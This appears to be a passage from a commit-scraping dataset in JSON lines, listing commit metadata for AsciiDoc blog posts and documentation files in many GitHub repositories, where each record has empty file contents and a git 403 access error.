403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"fcc23352b68a29c4b5461c77a296cf14f933e9ed","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01a7fab551f697b21108d511853e91cb27d96ff0","subject":"Update 2018-03-24-How-to-get-freelancer-work-for-you-for-free.adoc","message":"Update 2018-03-24-How-to-get-freelancer-work-for-you-for-free.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2018-03-24-How-to-get-freelancer-work-for-you-for-free.adoc","new_file":"_posts\/2018-03-24-How-to-get-freelancer-work-for-you-for-free.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82d49e32a0fa8774244627b74f8e66f093b06e2e","subject":"Finished with the user guide conversion","message":"Finished with the user guide conversion\n\ngit-svn-id: 10bc45916fe30ae642aa5037c9a4b05727bba413@1844883 13f79535-47bb-0310-9956-ffa450edef68\n","repos":"apache\/wss4j,apache\/wss4j","old_file":"src\/site\/asciidoc\/config.adoc","new_file":"src\/site\/asciidoc\/config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/wss4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"18adbafc69ad632830543de1a89bf557c1178526","subject":"Links corr Objects","message":"Links corr Objects\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"349be46fc016200c0cf6e2df98e2034887d76f50","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6b9e6968102e6bbdae6e894eb2973486fab4536","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4df2ca8427b4020035360437185518d96651ec61","subject":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","message":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","repos":"crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io","old_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crazyrandom\/crazyrandom.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6fa7f126ad1f5e1450bea3582d84e235be4ad2b","subject":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","message":"Update 
2017-06-09-Pepper-Amazon-Rekognition.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64eac0f40752690cac8d08c4576fcddecfc59b62","subject":"README.asciidoc; Softlink to the real README.","message":"README.asciidoc; Softlink to the real README.\n\n...that's the only way it gets displayed.\n","repos":"ubiqx-org\/Carnaval,manuella\/Carnaval","old_file":"scripts\/README.asciidoc","new_file":"scripts\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ubiqx-org\/Carnaval.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"247b25d01b559d0be5242ddab582e6af2cdb8ea8","subject":"Update 2018-01-20-Bitrise-de-ci.adoc","message":"Update 2018-01-20-Bitrise-de-ci.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-20-Bitrise-de-ci.adoc","new_file":"_posts\/2018-01-20-Bitrise-de-ci.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d06c13895400560865b3285401c3eb5b885cf3a1","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a34d033c523c7c36902b2e0dd5c50d26bcf5f56","subject":"Publish 20161110-1232.adoc","message":"Publish 20161110-1232.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1232.adoc","new_file":"20161110-1232.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b94e42afc3ed16ed8bd9b77b8b26faa05b102748","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0acd443082aee2e03128446ab4888f1651618174","subject":"Update 2018-03-19-Docker-Image-Google-Compute-Engine.adoc","message":"Update 2018-03-19-Docker-Image-Google-Compute-Engine.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-19-Docker-Image-Google-Compute-Engine.adoc","new_file":"_posts\/2018-03-19-Docker-Image-Google-Compute-Engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c572bcd57090f4843f86f40cbce322c01e092726","subject":"Update 2017-02-14-A-Lovely-Poem.adoc","message":"Update 2017-02-14-A-Lovely-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-02-14-A-Lovely-Poem.adoc","new_file":"_posts\/2017-02-14-A-Lovely-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2a3a8ecf0c78555663286a28dc7c65d775b2dba","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fee229f15eeff770098a422486916114287442a4","subject":"Update 2017-01-17-Learning-good-image-representation.adoc","message":"Update 2017-01-17-Learning-good-image-representation.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2017-01-17-Learning-good-image-representation.adoc","new_file":"_posts\/2017-01-17-Learning-good-image-representation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bac9a97afa041347fe4ae6e359066ab300aee73","subject":"Update 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","message":"Update 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e584412de7191da83addcde90c193c6b7b99dc7d","subject":"Add the manual for cowboy_http2","message":"Add 
the manual for cowboy_http2\n","repos":"hairyhum\/cowboy,ninenines\/cowboy,bsmr-erlang\/cowboy,rabbitmq\/cowboy,kivra\/cowboy,K2InformaticsGmbH\/cowboy,turtleDeng\/cowboy,CrankWheel\/cowboy","old_file":"doc\/src\/manual\/cowboy_http2.asciidoc","new_file":"doc\/src\/manual\/cowboy_http2.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rabbitmq\/cowboy.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"199a7d360d772b83f6dd4a7b3550a24a0815a69f","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1578d71c54b64e5f257c73eba48e890679fb3aff","subject":"Update 2018-08-23-Lover.adoc","message":"Update 2018-08-23-Lover.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-08-23-Lover.adoc","new_file":"_posts\/2018-08-23-Lover.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"872c736477f982cdc92142364415f7cd7a4bd555","subject":"add company","message":"add company\n","repos":"clojure\/clojure-site","old_file":"content\/community\/companies.adoc","new_file":"content\/community\/companies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"27f98bdd3c447f07fcce826ad927221803ad592f","subject":"rework deps guide","message":"rework deps guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/deps_and_cli.adoc","new_file":"content\/guides\/deps_and_cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"62fac5aef8356cba50bb3b5d99384f5f008e2242","subject":"couldn't figure out a better place to put this - just document the yaml settings for the agent","message":"couldn't figure out a better place to put this - just document the yaml settings for the agent\n","repos":"hawkular\/hawkular-agent,hawkular\/hawkular-agent,hawkular\/hawkular-agent","old_file":"hawkular-javaagent\/AGENT-CONFIG.adoc","new_file":"hawkular-javaagent\/AGENT-CONFIG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-agent.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1a05aa8c9d7dc639df965af5a6ed16ddc358df3b","subject":"Create README.adoc","message":"Create 
README.adoc","repos":"ktoso\/asciidoctor-sbt-plugin,ktoso\/asciidoctor-sbt-plugin,ktoso\/asciidoctor-sbt-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ktoso\/asciidoctor-sbt-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f101017811f762f6744cb28ccea015a1b366821","subject":"Provide some examples","message":"Provide some examples","repos":"jprante\/elasticsearch-plugin-bundle,jprante\/elasticsearch-plugin-bundle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jprante\/elasticsearch-plugin-bundle.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b1a9b299d1f908a6c5b762cb6e761b69d7934411","subject":"explain navinfo, navinfo1, navinfo2 new attributes","message":"explain navinfo, navinfo1, navinfo2 new attributes\n","repos":"llaville\/asciidoc-bootstrap-backend,llaville\/asciidoc-bootstrap-backend","old_file":"docs\/document-structure.asciidoc","new_file":"docs\/document-structure.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/llaville\/asciidoc-bootstrap-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"50324a35679826dbcc245b5efb5facbba76bb926","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"108d531759b0759708e2c1cdc3da24dae56a780e","subject":"new Transaction documentation file","message":"new Transaction documentation file\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/fermat_dap\/digital_asset_transaction\/asset_redemption\/bitDubai\/version-1\/version1.asciidoc","new_file":"fermat-documentation\/fermat_dap\/digital_asset_transaction\/asset_redemption\/bitDubai\/version-1\/version1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dfed5a8ec3d257c59c4badd4bd82855fd528937","subject":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df17f080e65eaa16d0536ec72e66e85a34d9c0a4","subject":"draft for gist","message":"draft for gist\n","repos":"qnib\/neo4j-hackathon2015","old_file":"qinv.adoc","new_file":"qinv.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qnib\/neo4j-hackathon2015.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"975de6cedabdb51b590e15750f2455279378993d","subject":"Update 2015-09-19-God-with-you.adoc","message":"Update 2015-09-19-God-with-you.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-19-God-with-you.adoc","new_file":"_posts\/2015-09-19-God-with-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"859633799e7867aa053ec67241bb93229568d4cd","subject":"Update 2016-01-31-what-is-PyPy.adoc","message":"Update 2016-01-31-what-is-PyPy.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-31-what-is-PyPy.adoc","new_file":"_posts\/2016-01-31-what-is-PyPy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdce4bae58a8c94cf6a485087c1e3aa49ff831c0","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3211c20a3b47ff441e1a11fe856775afeecb3374","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99a2768b33834461a03c62a839732ed75b9c421c","subject":"upd links","message":"upd links","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/JPA.adoc","new_file":"Best practices\/JPA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c5619a29a789c10e2b436f83a83484d1cda732b","subject":"Fix spelling error","message":"Fix spelling 
error","repos":"uschindler\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/query-dsl\/query-string-syntax.asciidoc","new_file":"docs\/reference\/query-dsl\/query-string-syntax.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gingerwizard\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dadd3635283f92d37a3f6d298dff1b90e9df3075","subject":"Update 2015-07-22-Werther.adoc","message":"Update 2015-07-22-Werther.adoc","repos":"fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io","old_file":"_posts\/2015-07-22-Werther.adoc","new_file":"_posts\/2015-07-22-Werther.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fr-developer\/fr-developer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a388177f1cb9bbd3c51296b5a09fdfccaf8cf3cc","subject":"Update 2017-01-01-Lets-learn-Haskell-with-Physics.adoc","message":"Update 2017-01-01-Lets-learn-Haskell-with-Physics.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-01-Lets-learn-Haskell-with-Physics.adoc","new_file":"_posts\/2017-01-01-Lets-learn-Haskell-with-Physics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61db0102c0cacf5b1a8fafb603d9cba646f234fd","subject":"Update 2017-12-31-Building-an-AntiCheating-system.adoc","message":"Update 
2017-12-31-Building-an-AntiCheating-system.adoc","repos":"suedadam\/suedadam.github.io,suedadam\/suedadam.github.io,suedadam\/suedadam.github.io","old_file":"_posts\/2017-12-31-Building-an-AntiCheating-system.adoc","new_file":"_posts\/2017-12-31-Building-an-AntiCheating-system.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suedadam\/suedadam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15c277c89297973285751e9b1e0b415728426d3c","subject":"_posts\/2016-07-13-MH17.adoc","message":"_posts\/2016-07-13-MH17.adoc\n","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-07-13-MH17.adoc","new_file":"_posts\/2016-07-13-MH17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e5fa5c6299af332276f15fc7dde7463d2d0e637","subject":"Update 2016-02-02-my-title.adoc","message":"Update 2016-02-02-my-title.adoc","repos":"alexbleasdale\/alexbleasdale.github.io,alexbleasdale\/alexbleasdale.github.io,alexbleasdale\/alexbleasdale.github.io","old_file":"_posts\/2016-02-02-my-title.adoc","new_file":"_posts\/2016-02-02-my-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexbleasdale\/alexbleasdale.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c23f53c70deff4e40963166150ee8cf1e481131","subject":"y2b create post 1TB PS3 Hard Drive Upgrade","message":"y2b create post 1TB PS3 Hard Drive Upgrade","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-23-1TB-PS3-Hard-Drive-Upgrade.adoc","new_file":"_posts\/2011-10-23-1TB-PS3-Hard-Drive-Upgrade.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63a6f0c2e7115b6efcf1452d4ec80b382d0741ba","subject":"Debezium 1.1.0.Alpha1 release announcement","message":"Debezium 1.1.0.Alpha1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-01-16-debezium-1-1-alpha1-released.adoc","new_file":"blog\/2020-01-16-debezium-1-1-alpha1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e77452d4f7402308b6d5ed9498cc698765a9df07","subject":"Update 2017-06-07-pip-via-cntlm.adoc","message":"Update 2017-06-07-pip-via-cntlm.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-07-pip-via-cntlm.adoc","new_file":"_posts\/2017-06-07-pip-via-cntlm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 
